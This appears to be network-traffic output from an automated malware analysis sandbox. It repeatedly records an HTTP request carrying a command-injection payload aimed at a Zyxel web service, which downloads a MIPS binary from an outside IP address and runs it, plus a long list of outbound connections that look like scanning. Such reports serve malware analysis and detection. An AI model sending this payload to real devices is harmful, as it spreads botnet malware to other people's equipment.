            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 157.100.233.53
            Source: unknownTCP traffic detected without corresponding DNS query: 157.187.230.134
            Source: unknownTCP traffic detected without corresponding DNS query: 41.63.226.52
            Source: unknownTCP traffic detected without corresponding DNS query: 157.44.22.26
            Source: unknownTCP traffic detected without corresponding DNS query: 136.190.71.179
            Source: unknownTCP traffic detected without corresponding DNS query: 41.99.237.158
            Source: unknownTCP traffic detected without corresponding DNS query: 197.73.174.220
            Source: unknownTCP traffic detected without corresponding DNS query: 197.132.160.235
            Source: unknownTCP traffic detected without corresponding DNS query: 41.62.188.121
            Source: unknownTCP traffic detected without corresponding DNS query: 41.149.47.179
            Source: unknownTCP traffic detected without corresponding DNS query: 41.136.152.45
            Source: unknownTCP traffic detected without corresponding DNS query: 157.171.27.53
            Source: unknownTCP traffic detected without corresponding DNS query: 41.51.222.60
            Source: unknownTCP traffic detected without corresponding DNS query: 204.140.98.85
            Source: unknownTCP traffic detected without corresponding DNS query: 41.48.171.17
            Source: unknownTCP traffic detected without corresponding DNS query: 157.14.240.190
            Source: unknownTCP traffic detected without corresponding DNS query: 187.162.147.48
            Source: unknownTCP traffic detected without corresponding DNS query: 149.255.111.32
            Source: unknownTCP traffic detected without corresponding DNS query: 197.73.255.153
            Source: unknownTCP traffic detected without corresponding DNS query: 209.23.98.184
            Source: unknownTCP traffic detected without corresponding DNS query: 197.181.130.221
            Source: unknownTCP traffic detected without corresponding DNS query: 41.201.68.123
            Source: unknownTCP traffic detected without corresponding DNS query: 197.184.237.174
            Source: unknownTCP traffic detected without corresponding DNS query: 157.134.174.180
            Source: unknownTCP traffic detected without corresponding DNS query: 134.103.63.212
            Source: unknownTCP traffic detected without corresponding DNS query: 41.137.189.176
            Source: unknownTCP traffic detected without corresponding DNS query: 157.135.54.178
            Source: unknownTCP traffic detected without corresponding DNS query: 157.174.182.43
            Source: unknownTCP traffic detected without corresponding DNS query: 157.101.123.169
            Source: unknownTCP traffic detected without corresponding DNS query: 50.132.215.189
            Source: unknownTCP traffic detected without corresponding DNS query: 157.247.160.184
            Source: unknownTCP traffic detected without corresponding DNS query: 65.208.233.35
            Source: unknownTCP traffic detected without corresponding DNS query: 41.102.213.179
            Source: unknownTCP traffic detected without corresponding DNS query: 36.214.226.170
            Source: unknownTCP traffic detected without corresponding DNS query: 197.42.223.180
            Source: unknownTCP traffic detected without corresponding DNS query: 41.204.19.69
            Source: unknownTCP traffic detected without corresponding DNS query: 197.199.148.38
            Source: unknownTCP traffic detected without corresponding DNS query: 197.249.19.167
            Source: unknownTCP traffic detected without corresponding DNS query: 147.57.178.0
            Source: unknownTCP traffic detected without corresponding DNS query: 157.122.211.5
            Source: unknownTCP traffic detected without corresponding DNS query: 41.64.150.123
            Source: unknownTCP traffic detected without corresponding DNS query: 41.33.25.144
            Source: unknownTCP traffic detected without corresponding DNS query: 41.81.202.220
            Source: unknownTCP traffic detected without corresponding DNS query: 41.187.33.142
            Source: unknownTCP traffic detected without corresponding DNS query: 157.93.26.107
            Source: unknownTCP traffic detected without corresponding DNS query: 197.184.156.78
            Source: unknownTCP traffic detected without corresponding DNS query: 157.154.138.230
            Source: unknownTCP traffic detected without corresponding DNS query: 197.138.254.106
            Source: unknownTCP traffic detected without corresponding DNS query: 197.128.46.83
            Source: unknownTCP traffic detected without corresponding DNS query: 197.167.219.190
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
